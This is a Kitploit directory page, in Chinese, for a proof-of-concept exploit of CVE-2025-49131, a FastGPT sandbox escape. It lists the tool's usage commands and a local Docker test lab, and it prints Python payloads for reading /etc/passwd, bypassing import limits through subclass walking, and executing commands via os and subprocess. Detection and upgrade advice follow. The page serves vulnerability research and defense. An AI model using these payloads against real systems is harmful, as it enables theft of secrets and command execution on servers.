Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-49131-poc — 针对CVE-2025-49131的概念验证漏洞利用,这是FastGPT中的沙箱逃逸,允许通过沙箱API进行任意文件读写、导入绕过和远程代码执行。 | Kitploit
工具/GitHubGitHub/wenura17125/cve-2025-49131-poc
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育远程访问工具容器逃逸
GitHubwenura17125/cve-2025-49131-poc

cve-2025-49131-poc

针对CVE-2025-49131的概念验证漏洞利用,这是FastGPT中的沙箱逃逸,允许通过沙箱API进行任意文件读写、导入绕过和远程代码执行。

查看仓库
189个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-49131 - FastGPT 沙箱逃逸 POC

 ███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗
 ██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝
 █████╗  ███████║███████╗   ██║   ██║  ███╗██████╔╝   ██║   
 ██╔══╝  ██╔══██║╚════██║   ██║   ██║   ██║██╔═══╝    ██║   
 ██║     ██║  ██║███████║   ██║   ╚██████╔╝██║        ██║   
 ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝    ╚═════╝ ╚═╝        ╚═╝   
                                                            
 ███████╗ █████╗ ███╗   ██╗██████╗ ██████╗  ██████╗ ██╗  ██╗
 ██╔════╝██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝
 ███████╗███████║██╔██╗ ██║██║  ██║██████╔╝██║   ██║ ╚███╔╝ 
 ╚════██║██╔══██║██║╚██╗██║██║  ██║██╔══██╗██║   ██║ ██╔██╗ 
 ███████║██║  ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗
 ╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝╚═════╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝
                                                            
 ███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗           
 ██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝           
 █████╗  ███████╗██║     ███████║██████╔╝█████╗             
 ██╔══╝  ╚════██║██║     ██╔══██║██╔═══╝ ██╔══╝             
 ███████╗███████║╚██████╗██║  ██║██║     ███████╗           
 ╚══════╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝     ╚══════╝           
                                                            
        ╔═══════════════════════════════════════╗
        ║     CVE-2025-49131 | CVSS 6.3        ║
        ║   FastGPT 沙箱容器逃逸               ║
        ║      受影响版本: < v4.9.11            ║
        ╚═══════════════════════════════════════╝

🎯 漏洞概述

字段值
CVE IDCVE-2025-49131
CVSS 评分6.3 (中等)
CVSS 向量AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
漏洞类型沙箱逃逸
受影响软件FastGPT (fastgpt-sandbox 容器)
受影响版本< 4.9.11
修复版本4.9.11+
披露日期2025年6月9日

⚠️ 免责声明

此工具仅用于授权安全研究和教育目的。

  • 仅在你拥有或获得明确书面授权的系统上进行测试
  • 遵循负责任的披露实践
  • 遵守所有适用的法律法规

📖 描述

CVE-2025-49131 是 FastGPT 的 fastgpt-sandbox 容器中的一个沙箱逃逸漏洞。该漏洞存在的原因为:

  • 隔离机制不足 - 沙箱未正确限制 Python 内置函数
  • 系统调用过于宽松 - 危险的系统调用未被阻止
  • 代码执行限制不足 - 可绕过导入限制

影响

成功利用可允许攻击者:

  • ✅ 读取任意文件 - 访问 /etc/passwd、配置文件、机密
  • ✅ 写入任意文件 - 修改系统文件、注入恶意代码
  • ✅ 绕过 Python 导入限制 - 导入 os、subprocess 模块
  • ✅ 潜在远程代码执行 - 通过导入的模块执行系统命令

🚀 快速开始

# Clone this repository
git clone https://github.com/Wenura17125/cve-2025-49131-poc.git
cd cve-2025-49131-poc

# Install dependencies
pip install -r requirements.txt

# Run vulnerability detection
python poc.py --target http://localhost:3001 --detect

# Read a file
python poc.py --target http://localhost:3001 --read /etc/passwd

# Attempt RCE
python poc.py --target http://localhost:3001 --rce "id"

🔧 搭建脆弱环境

# Start vulnerable and patched containers
docker-compose up -d

# Vulnerable sandbox on port 3001
# Patched sandbox on port 3002

💻 使用方法

检测模式 (非破坏性)

python poc.py --target http://localhost:3001 --detect -v

读取任意文件

python poc.py --target http://localhost:3001 --read /etc/passwd
python poc.py --target http://localhost:3001 --read /proc/self/environ

写入文件

python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131"

绕过导入限制

python poc.py --target http://localhost:3001 --import os
python poc.py --target http://localhost:3001 --import subprocess

环境变量

python poc.py --target http://localhost:3001 --env

远程代码执行

python poc.py --target http://localhost:3001 --rce "whoami"
python poc.py --target http://localhost:3001 --rce "cat /etc/passwd"

完整选项

python poc.py --help

📁 项目结构

cve-2025-49131-poc/
├── poc.py                # Main exploit script
├── payloads.py           # Payload generator library
├── docker-compose.yml    # Test environment
├── requirements.txt      # Python dependencies
├── README.md             # This file
└── tests/
    └── test_exploit.py   # Automated tests

🔬 技术细节

漏洞根本原因

FastGPT 沙箱设计用于在隔离环境中执行用户提交的代码。然而,隔离机制不足:

  1. Python __builtins__ 访问 - 沙箱未正确限制对内置函数(如 open()、__import__() 等)的访问。

  2. 系统调用过滤 - 允许的系统调用列表包含危险调用,使得可以访问文件系统

  3. 绕过导入限制 - 存在多种技术来绕过模块导入限制

利用流程

┌─────────────────────────────────────────────┐
│ 1. Send malicious code to sandbox API       │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 2. Bypass sandbox restrictions using:       │
│    - __builtins__ manipulation              │
│    - Subclass walking                       │
│    - Import bypass techniques               │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 3. Gain access to:                          │
│    - File system (read/write)               │
│    - os/subprocess modules                  │
│    - Environment variables                  │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 4. Impact:                                  │
│    - Data exfiltration                      │
│    - Code injection                         │
│    - Remote command execution               │
└─────────────────────────────────────────────┘

示例载荷

文件读取:

open('/etc/passwd', 'r').read()
__builtins__.open('/etc/passwd').read()

绕过导入:

__import__('os')
__builtins__.__import__('os')
[x for x in ().__class__.__base__.__subclasses__() 
 if x.__name__=='catch_warnings'][0]()._module.__builtins__['__import__'](https://github.com/wenura17125/cve-2025-49131-poc/blob/main/%27os%27)

远程代码执行:

__import__('os').popen('id').read()
__import__('subprocess').check_output('id', shell=True)

🛡️ 检测与缓解

检测

在沙箱日志中查找可疑活动:

  • 尝试访问 /etc/passwd、/etc/shadow
  • 调用 __builtins__、__import__
  • 使用 subprocess 或 os 模块
  • 异常的文件读/写操作

缓解措施

  1. 升级 FastGPT 至 4.9.11 或更高版本
  2. 网络隔离 - 限制沙箱容器的网络访问
  3. 资源限制 - 对容器应用 CPU/内存限制
  4. 监控 - 为沙箱活动实现日志记录和告警

📚 参考资料

  • NVD - CVE-2025-49131
  • FastGPT GitHub
  • GitHub 安全公告
  • FastGPT 文档

⏱️ 时间线

日期事件
2025-??-??漏洞发现
2025-??-??通知厂商
2025-06-??发布补丁 (v4.9.11)
2025-06-09公开披露

📄 许可证

本项目仅用于教育和授权安全研究目的。请负责任地使用。


为安全研究目的而创建。在测试之前务必获得适当授权。

下载工具